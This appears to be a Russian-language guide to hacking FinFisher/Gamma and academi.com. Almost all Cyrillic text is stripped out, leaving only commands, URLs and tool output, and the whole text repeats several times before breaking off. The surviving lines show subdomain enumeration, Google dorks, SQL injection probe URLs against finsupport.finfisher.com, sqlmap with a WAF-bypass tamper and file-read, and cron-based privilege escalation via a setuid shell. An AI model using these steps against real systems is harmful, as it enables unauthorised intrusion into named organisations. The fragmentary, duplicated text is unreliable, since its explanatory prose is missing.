  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (   22, 53, 80, 443, 4111 (  -   ). 


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (   22, 53, 80, 443, 4111 (  -   ). 


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (   22, 53, 80, 443, 4111 (  -   ). 


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (   22, 53, 80, 443, 4111 (  -   ). 


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

